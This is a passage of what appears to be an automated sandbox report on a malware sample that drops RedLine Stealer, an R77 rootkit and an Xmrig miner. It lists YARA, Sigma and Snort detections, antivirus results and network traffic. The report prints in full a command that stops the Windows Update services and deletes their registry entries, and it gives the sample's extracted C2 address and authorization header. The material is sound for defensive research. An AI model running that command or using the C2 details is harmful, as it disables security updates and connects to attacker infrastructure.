6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x14d95:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x15081:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x15379:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x15679:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x15961:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x15c49:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x15f31:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x16235:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x16541:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x1683d:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x16b39:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x16e29:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17135:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17425:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17705:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17a11:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ...
65.0.dllhost.exe.140000000.4.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x1db87:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
65.0.dllhost.exe.14001e0b0.13.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x2cd7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
37.0.GoogleUpdate.exe.e40000.0.unpack	SUSP_Unsigned_GoogleUpdate	Detects suspicious unsigned GoogleUpdate.exe	Florian Roth	0x16ac5:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x16dd5:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x170b1:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x173a1:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17691:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17995:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17c81:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17f79:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18279:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18561:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18849:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18b31:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18e35:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x19141:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x1943d:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x19739:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x19a29:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x19d35:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x1a025:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x1a305:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x1a611:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ...
0.3.hZDPlQwZ9D.exe.700000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.3.hZDPlQwZ9D.exe.700000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xce8:$pat14: , CommandLine: 0x192b3:$v2_1: ListOfProcesses 0x19047:$v4_3: base64str 0x1a0b6:$v4_4: stringKey 0x16c90:$v4_5: BytesToStringConverted 0x15cf8:$v4_6: FromBase64 0x17458:$v4_8: procName 0x177db:$v5_1: DownloadAndExecuteUpdate 0x18f57:$v5_2: ITaskProcessor 0x177c9:$v5_3: CommandLineUpdate 0x177ba:$v5_4: DownloadUpdate 0x17e51:$v5_5: FileScanning 0x16fff:$v5_7: RecordHeaderField 0x16a1e:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
65.0.dllhost.exe.14001e0b0.9.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x2cd7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
0.2.hZDPlQwZ9D.exe.413788.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.hZDPlQwZ9D.exe.413788.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x174b3:$v2_1: ListOfProcesses 0x17247:$v4_3: base64str 0x182b6:$v4_4: stringKey 0x14e90:$v4_5: BytesToStringConverted 0x13ef8:$v4_6: FromBase64 0x15658:$v4_8: procName 0x159db:$v5_1: DownloadAndExecuteUpdate 0x17157:$v5_2: ITaskProcessor 0x159c9:$v5_3: CommandLineUpdate 0x159ba:$v5_4: DownloadUpdate 0x16051:$v5_5: FileScanning 0x151ff:$v5_7: RecordHeaderField 0x14c1e:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
61.2.powershell.exe.1cd24af6f58.11.raw.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x38d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
61.2.powershell.exe.1cd24ab9470.9.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x3d5bf:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
65.0.dllhost.exe.14001e0b0.11.raw.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x38d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
8.0.ofg.exe.ea0000.0.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x122c9:$r1: Classes\Folder\shell\open\command 0x122ec:$k1: DelegateExecute
65.0.dllhost.exe.14001e0b0.7.raw.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x38d7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
65.0.dllhost.exe.140000000.8.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x1db87:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
65.0.dllhost.exe.140000000.6.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x1db87:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
65.0.dllhost.exe.140000000.3.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x1db87:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
65.0.dllhost.exe.140000000.10.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x1db87:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
61.2.powershell.exe.1cd24ad3720.10.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x2cd7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8 0x21d0f:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
61.2.powershell.exe.1cd249d2c18.6.raw.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x88b87:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8 0xa8bbf:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
61.2.powershell.exe.1cd249e7ac8.7.raw.unpack	Windows_Rootkit_R77_5bab748b	unknown	unknown	0x73cd7:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8 0x93d0f:$a: 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8
Click to see the 35 entries

Sigma Signatures

Operating System Destruction

Sigma detected: Stop multiple services

Source: Process started

Author: Joe Security: Data: Command: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f, CommandLine: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Google\brave.exe" , ParentImage: C:\Users\user\AppData\Local\Google\brave.exe, ParentProcessId: 5100, ParentProcessName: brave.exe, ProcessCommandLine: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f, ProcessId: 6068, ProcessName: cmd.exe

Snort Signatures

ET TROJAN Win32/Agent.AETZ CnC Checkin - Source IP: 192.168.2.5 - Destination IP: 172.66.43.60

Timestamp:	192.168.2.5172.66.43.60497154432039616 11/26/22-11:18:10.681121
SID:	2039616
Source Port:	49715
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 45.10.55.124

Timestamp:	192.168.2.545.10.55.12449706470292850286 11/26/22-11:17:39.162263
SID:	2850286
Source Port:	49706
Destination Port:	47029
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Redline Stealer TCP CnC - Id1Response - Source IP: 45.10.55.124 - Destination IP: 192.168.2.5

Timestamp:	45.10.55.124192.168.2.547029497062850353 11/26/22-11:17:20.924446
SID:	2850353
Source Port:	47029
Destination Port:	49706
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN RedLine Stealer TCP CnC net.tcp Init - Source IP: 192.168.2.5 - Destination IP: 45.10.55.124

Timestamp:	192.168.2.545.10.55.12449706470292850027 11/26/22-11:17:16.653088
SID:	2850027
Source Port:	49706
Destination Port:	47029
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://tempuri.org/Entity/Id19Responseon	URL Reputation: Label: phishing
Source: http://tempuri.org/Entity/Id19Responseon	URL Reputation: Label: phishing
Source: http://tempuri.org/Entity/Id4y/	URL Reputation: Label: phishing
Source: 45.10.55.124:47029	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Google\chrome.exe	Avira: detection malicious, Label: HEUR/AGEN.1213193
Source: C:\Users\user\AppData\Local\Temp\54A0.tmp	Avira: detection malicious, Label: TR/Dropper.MSIL.Gen
Source: C:\Windows\Temp\571D.tmp	Avira: detection malicious, Label: HEUR/AGEN.1213003

Multi AV Scanner detection for submitted file

Source: hZDPlQwZ9D.exe	Virustotal: Detection: 27%			Perma Link
Source: hZDPlQwZ9D.exe	ReversingLabs: Detection: 61%

Multi AV Scanner detection for dropped file

Source: C:\Program Files\Google\Chrome\updater.exe	ReversingLabs: Detection: 84%
Source: C:\Users\user\AppData\Local\Google\brave.exe	ReversingLabs: Detection: 84%
Source: C:\Users\user\AppData\Local\Google\chrome.exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Google\ofg.exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\54A0.tmp	ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\Local\Temp\fl.exe	ReversingLabs: Detection: 53%
Source: C:\Windows\Temp\5528.tmp	ReversingLabs: Detection: 45%
Source: C:\Windows\Temp\571D.tmp	ReversingLabs: Detection: 65%

Machine Learning detection for sample

Source: hZDPlQwZ9D.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Google\chrome.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Google\ofg.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Joe Sandbox ML: detected

Source: 57.0.dialer.exe.7ff670d40000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen
Source: 57.2.dialer.exe.7ff670d40000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen
Source: 57.0.dialer.exe.7ff670d40000.2.unpack	Avira: Label: TR/Dropper.MSIL.Gen

Source: 0.3.hZDPlQwZ9D.exe.700000.0.unpack

Malware Configuration Extractor: RedLine {"C2 url": ["45.10.55.124:47029"], "Authorization Header": "20099ff612f809efe61731940caf25e6"}

Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_004171DC CryptUnprotectData,	43_2_004171DC
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_002C15DA BCryptOpenAlgorithmProvider,BCryptSetProperty,strlen,BCryptGenerateSymmetricKey,	43_2_002C15DA
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_002C0B8E _wgetenv_s,_wgetenv_s,BCryptOpenAlgorithmProvider,BCryptSetProperty,strlen,BCryptGenerateSymmetricKey,strlen,strlen,BCryptDecrypt,	43_2_002C0B8E
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_002C1039 BCryptOpenAlgorithmProvider,BCryptSetProperty,strlen,BCryptGenerateSymmetricKey,	43_2_002C1039
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_002C111B BCryptOpenAlgorithmProvider,BCryptSetProperty,strlen,BCryptGenerateSymmetricKey,	43_2_002C111B
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_002C1112 BCryptOpenAlgorithmProvider,BCryptSetProperty,strlen,BCryptGenerateSymmetricKey,	43_2_002C1112
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_002C1156 BCryptOpenAlgorithmProvider,BCryptSetProperty,strlen,BCryptGenerateSymmetricKey,	43_2_002C1156
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_002C11AC BCryptOpenAlgorithmProvider,BCryptSetProperty,strlen,BCryptGenerateSymmetricKey,	43_2_002C11AC
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_002C11CF BCryptOpenAlgorithmProvider,BCryptSetProperty,strlen,BCryptGenerateSymmetricKey,	43_2_002C11CF
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_002C121E BCryptOpenAlgorithmProvider,BCryptSetProperty,strlen,BCryptGenerateSymmetricKey,	43_2_002C121E
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_002C12CC BCryptOpenAlgorithmProvider,BCryptSetProperty,strlen,BCryptGenerateSymmetricKey,	43_2_002C12CC
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_002C13BB BCryptOpenAlgorithmProvider,BCryptSetProperty,strlen,BCryptGenerateSymmetricKey,	43_2_002C13BB
Source: C:\Users\user\AppData\Local\Temp\fl.exe	Code function: 43_2_002C1399 BCryptOpenAlgorithmProvider,BCryptSetProperty,strlen,BCryptGenerateSymmetricKey,	43_2_002C1399

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match

File source: C:\Windows\Temp\571D.tmp, type: DROPPED

Source: hZDPlQwZ9D.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49853 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49857 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49877 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49880 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49883 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49890 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49892 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49895 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49901 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49903 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49909 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49925 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49929 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49943 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49952 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49955 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49960 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49963 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49966 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49969 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.66.43.60:443 -> 192.168.2.5:49973 version: TLS 1.2
